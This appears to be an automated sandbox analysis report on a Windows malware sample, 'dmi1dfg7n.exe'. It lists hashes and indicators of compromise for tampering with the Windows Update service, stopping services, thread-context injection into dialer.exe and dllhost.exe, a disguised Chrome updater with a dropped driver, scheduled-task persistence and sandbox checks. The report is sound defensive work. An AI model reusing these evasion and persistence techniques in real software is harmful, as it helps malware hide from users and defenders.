78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

Resubmissions

29-06-2023 21:17

230629-z452gsga5z 10

29-06-2023 20:49

230629-zmczdafh5y 10

Analysis

max time kernel
1801s
max time network
1789s
platform
windows10-2004_x64
resource
win10v2004-20230621-es
resource tags

arch:x64arch:x86image:win10v2004-20230621-eslocale:es-esos:windows10-2004-x64systemwindows
submitted
29-06-2023 21:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dmi1dfg7n.exe
Size

2.8MB
MD5

9253ed091d81e076a3037e12af3dc871
SHA1

ec02829a25b3bf57ad061bbe54180d0c99c76981
SHA256

78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
SHA512

29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
SSDEEP

49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score

10^/10

evasion

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 28 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesc.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

description	pid	process	target process
PID 1416 created 4256	1416	WerFault.exe	DllHost.exe
PID 1388 created 1372	1388	WerFault.exe	DllHost.exe
PID 2900 created 3408	2900	WerFault.exe	DllHost.exe
PID 1428 created 4208	1428	WerFault.exe	DllHost.exe
PID 3928 created 4812	3928	WerFault.exe	DllHost.exe
PID 560 created 2412	560	WerFault.exe	backgroundTaskHost.exe
PID 4648 created 3816	4648	WerFault.exe	DllHost.exe
PID 1348 created 4072	1348	DllHost.exe	WerFault.exe
PID 4332 created 2264	4332	WerFault.exe	DllHost.exe
PID 728 created 1232	728	WerFault.exe	DllHost.exe
PID 2420 created 5116	2420	WerFault.exe	DllHost.exe
PID 4072 created 4200	4072	WerFault.exe	DllHost.exe
PID 3768 created 1404	3768	WerFault.exe	DllHost.exe
PID 1556 created 4576	1556	WerFault.exe	DllHost.exe
PID 4700 created 4808	4700	WerFault.exe	DllHost.exe
PID 4156 created 4256	4156	WerFault.exe	DllHost.exe
PID 2280 created 3400	2280	WerFault.exe	DllHost.exe
PID 4648 created 4072	4648	sc.exe	DllHost.exe
PID 860 created 3128	860	WerFault.exe	sc.exe
PID 568 created 3828	568	WerFault.exe	DllHost.exe
PID 4208 created 2592	4208	WerFault.exe	DllHost.exe
PID 4432 created 2740	4432	WerFault.exe	DllHost.exe
PID 3516 created 748	3516	WerFault.exe	DllHost.exe
PID 2828 created 4648	2828	WerFault.exe	sc.exe
PID 2520 created 5084	2520	WerFault.exe	DllHost.exe
PID 804 created 3624	804	WerFault.exe	DllHost.exe
PID 1320 created 3928	1320	WerFault.exe	powershell.exe
PID 4252 created 3692	4252	WerFault.exe	DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 64 IoCs

Processes:

powershell.EXEpowershell.EXEsvchost.exe

description	pid	process	target process
PID 1688 created 624	1688	powershell.EXE	winlogon.exe
PID 2824 created 624	2824	powershell.EXE	winlogon.exe
PID 3264 created 3828	3264	svchost.exe	DllHost.exe
PID 3264 created 4256	3264	svchost.exe	DllHost.exe
PID 3264 created 1372	3264	svchost.exe	DllHost.exe
PID 3264 created 3980	3264	svchost.exe	DllHost.exe
PID 3264 created 4700	3264	svchost.exe	DllHost.exe
PID 3264 created 1232	3264	svchost.exe	DllHost.exe
PID 3264 created 4228	3264	svchost.exe	DllHost.exe
PID 3264 created 3596	3264	svchost.exe	DllHost.exe
PID 3264 created 4120	3264	svchost.exe	DllHost.exe
PID 3264 created 4856	3264	svchost.exe	DllHost.exe
PID 3264 created 4948	3264	svchost.exe	DllHost.exe
PID 3264 created 3372	3264	svchost.exe	DllHost.exe
PID 3264 created 4944	3264	svchost.exe	DllHost.exe
PID 3264 created 4716	3264	svchost.exe	DllHost.exe
PID 3264 created 636	3264	svchost.exe	WerFault.exe
PID 3264 created 3408	3264	svchost.exe	DllHost.exe
PID 3264 created 3028	3264	svchost.exe	WerFault.exe
PID 3264 created 1708	3264	svchost.exe	DllHost.exe
PID 3264 created 4480	3264	svchost.exe	DllHost.exe
PID 3264 created 5012	3264	svchost.exe	DllHost.exe
PID 3264 created 3652	3264	svchost.exe	WerFault.exe
PID 3264 created 4780	3264	svchost.exe	WerFault.exe
PID 3264 created 4564	3264	svchost.exe	WerFault.exe
PID 3264 created 2588	3264	svchost.exe	DllHost.exe
PID 3264 created 2276	3264	svchost.exe	WerFault.exe
PID 3264 created 2264	3264	svchost.exe	DllHost.exe
PID 3264 created 772	3264	svchost.exe	DllHost.exe
PID 3264 created 432	3264	svchost.exe	DllHost.exe
PID 3264 created 2016	3264	svchost.exe	DllHost.exe
PID 3264 created 5116	3264	svchost.exe	DllHost.exe
PID 3264 created 2632	3264	svchost.exe	DllHost.exe
PID 3264 created 5004	3264	svchost.exe	DllHost.exe
PID 3264 created 224	3264	svchost.exe	DllHost.exe
PID 3264 created 4792	3264	svchost.exe	WerFault.exe
PID 3264 created 1528	3264	svchost.exe	DllHost.exe
PID 3264 created 3520	3264	svchost.exe	DllHost.exe
PID 3264 created 1036	3264	svchost.exe	DllHost.exe
PID 3264 created 4580	3264	svchost.exe	DllHost.exe
PID 3264 created 5116	3264	svchost.exe	DllHost.exe
PID 3264 created 4868	3264	svchost.exe	DllHost.exe
PID 3264 created 848	3264	svchost.exe	WerFault.exe
PID 3264 created 4824	3264	svchost.exe	DllHost.exe
PID 3264 created 2872	3264	svchost.exe	DllHost.exe
PID 3264 created 2044	3264	svchost.exe	DllHost.exe
PID 3264 created 4208	3264	svchost.exe	DllHost.exe
PID 3264 created 2460	3264	svchost.exe	DllHost.exe
PID 3264 created 3700	3264	svchost.exe	DllHost.exe
PID 3264 created 3060	3264	svchost.exe	DllHost.exe
PID 3264 created 1784	3264	svchost.exe	DllHost.exe
PID 3264 created 1956	3264	svchost.exe	DllHost.exe
PID 3264 created 4812	3264	svchost.exe	DllHost.exe
PID 3264 created 2640	3264	svchost.exe	DllHost.exe
PID 3264 created 2968	3264	svchost.exe	DllHost.exe
PID 3264 created 4804	3264	svchost.exe	DllHost.exe
PID 3264 created 5116	3264	svchost.exe	DllHost.exe
PID 3264 created 5012	3264	svchost.exe	DllHost.exe
PID 3264 created 2412	3264	svchost.exe	backgroundTaskHost.exe
PID 3264 created 3816	3264	svchost.exe	DllHost.exe
PID 3264 created 2328	3264	svchost.exe	WerFault.exe
PID 3264 created 4192	3264	svchost.exe	DllHost.exe
PID 3264 created 4968	3264	svchost.exe	DllHost.exe
PID 3264 created 4948	3264	svchost.exe	DllHost.exe

Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation	cmd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2177513644-1903222820-241662473-1000\Control Panel\International\Geo\Nation	cmd.exe

Executes dropped EXE 2 IoCs

Processes:

updater.exeupdater.exe

pid process

852 updater.exe
4292 updater.exe

pid	process
852	updater.exe
4292	updater.exe

Checks system information in the registry 2 TTPs 4 IoCs

System information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

cmd.execmd.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName	cmd.exe

Drops file in System32 directory 27 IoCs

Processes:

powershell.EXEsvchost.exeOfficeClickToRun.exepowershell.EXEpowershell.EXEpowershell.EXEpowershell.exesvchost.exesvchost.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEpowershell.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc32	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	OfficeClickToRun.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	OfficeClickToRun.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_E503B048B745DFA14B81FCFC68D6DECE	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx	svchost.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\80237EE4964FC9C409AAF55BF996A292_D46D6FA25B74360E1349F9015B5CCE53	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\dialersvc64	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe

Suspicious use of SetThreadContext 11 IoCs

Processes:

dmi1dfg7n.exepowershell.EXEpowershell.EXEupdater.exedmi1dfg7n.exepowershell.EXEpowershell.EXEdmi1dfg7n.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 4980 set thread context of 2892	4980	dmi1dfg7n.exe	dialer.exe
PID 1688 set thread context of 3720	1688	powershell.EXE	dllhost.exe
PID 2824 set thread context of 3084	2824	powershell.EXE	dllhost.exe
PID 852 set thread context of 2672	852	updater.exe	dialer.exe
PID 852 set thread context of 4956	852	updater.exe	dialer.exe
PID 2388 set thread context of 4488	2388	dmi1dfg7n.exe	dialer.exe
PID 1668 set thread context of 3736	1668	powershell.EXE	dllhost.exe
PID 3612 set thread context of 1524	3612	powershell.EXE	sc.exe
PID 4408 set thread context of 1676	4408	dmi1dfg7n.exe	dialer.exe
PID 2968 set thread context of 1428	2968	powershell.EXE	dllhost.exe
PID 1784 set thread context of 3960	1784	powershell.EXE	dllhost.exe

Drops file in Program Files directory 8 IoCs

Processes:

updater.execmd.exedmi1dfg7n.exeupdater.execmd.execmd.exedmi1dfg7n.exedmi1dfg7n.exe

description	ioc	process
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File opened for modification	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Libs\g.log	cmd.exe
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe
File created	C:\Program Files\Google\Chrome\updater.exe	dmi1dfg7n.exe

Drops file in Windows directory 14 IoCs

Processes:

dialer.exedialer.exedialer.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	svchost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File created	C:\Windows\Tasks\dialersvc64.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	svchost.exe
File created	C:\Windows\Tasks\dialersvc32.job	dialer.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	dialer.exe

Launches sc.exe 25 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
3760	sc.exe
892	sc.exe
3128	sc.exe
1524	sc.exe
4528	sc.exe
3696	sc.exe
1268	sc.exe
5116	sc.exe
1556	sc.exe
2836	sc.exe
496	sc.exe
1504	sc.exe
2964	sc.exe
1688	sc.exe
3016	sc.exe
2044	sc.exe
4132	sc.exe
560	sc.exe
3872	sc.exe
2496	sc.exe
4648	sc.exe
3956	sc.exe
2624	sc.exe
2560	sc.exe
2384	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
4376	3516	WerFault.exe	DllHost.exe
3128	4456	WerFault.exe	DllHost.exe
4856	3828	WerFault.exe	DllHost.exe
2620	4256	WerFault.exe	DllHost.exe
772	1372	WerFault.exe	DllHost.exe
1676	3980	WerFault.exe	DllHost.exe
1908	4700	WerFault.exe	DllHost.exe
1564	1232	WerFault.exe	DllHost.exe
4564	4228	WerFault.exe	DllHost.exe
4648	3596	WerFault.exe	DllHost.exe
1884	4120	WerFault.exe	DllHost.exe
2100	4856	WerFault.exe	DllHost.exe
4200	4948	WerFault.exe	DllHost.exe
4436	3372	WerFault.exe	DllHost.exe
2416	4944	WerFault.exe	DllHost.exe
2832	4716	WerFault.exe	DllHost.exe
4128	636	WerFault.exe
3940	3408	WerFault.exe	DllHost.exe
1940	3028	WerFault.exe
3824	1708	WerFault.exe	DllHost.exe
496	4480	WerFault.exe	DllHost.exe
4584	5012	WerFault.exe
4284	3652	WerFault.exe
2256	4780	WerFault.exe
1668	4564	WerFault.exe
636	2588	WerFault.exe	DllHost.exe
4792	2264	WerFault.exe
992	2276	WerFault.exe	DllHost.exe
3520	772	WerFault.exe	DllHost.exe
3928	432	WerFault.exe	DllHost.exe
1484	2016	WerFault.exe	DllHost.exe
4264	5116	WerFault.exe
3616	2632	WerFault.exe	DllHost.exe
2348	5004	WerFault.exe	DllHost.exe
1548	224	WerFault.exe	DllHost.exe
4140	4792	WerFault.exe
1420	1528	WerFault.exe	DllHost.exe
3596	3520	WerFault.exe	DllHost.exe
3268	1036	WerFault.exe	DllHost.exe
4500	4580	WerFault.exe	DllHost.exe
1992	5116	WerFault.exe
4680	4868	WerFault.exe	DllHost.exe
776	848	WerFault.exe
1172	4824	WerFault.exe	DllHost.exe
2416	2872	WerFault.exe	DllHost.exe
2968	2044	WerFault.exe
4744	4208	WerFault.exe	DllHost.exe
4564	2460	WerFault.exe	DllHost.exe
1056	3700	WerFault.exe	DllHost.exe
1080	3060	WerFault.exe	DllHost.exe
3584	1784	WerFault.exe	DllHost.exe
4924	1956	WerFault.exe
4384	4812	WerFault.exe	DllHost.exe
5008	2640	WerFault.exe	DllHost.exe
4864	2968	WerFault.exe	DllHost.exe
4948	4804	WerFault.exe	DllHost.exe
5064	5116	WerFault.exe
3652	5012	WerFault.exe	DllHost.exe
2944	2412	WerFault.exe	DllHost.exe
656	3816	WerFault.exe	DllHost.exe
1940	2328	WerFault.exe
1636	4192	WerFault.exe	DllHost.exe
5092	4968	WerFault.exe	DllHost.exe
4212	4948	WerFault.exe	DllHost.exe

Checks processor information in registry 2 TTPs 64 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeDllHost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exesc.exeWerFault.exedllhost.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeDllHost.exeWerFault.exeWerFault.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Conhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Conhost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	DllHost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	DllHost.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	sc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	dllhost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	DllHost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WerFault.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WerFault.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WerFault.exe

Detects videocard installed 1 TTPs 2 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exeWMIC.exe

pid process

1716 WMIC.exe
3860 WMIC.exe

pid	process
1716	WMIC.exe
3860	WMIC.exe

Enumerates system info in registry 2 TTPs 64 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

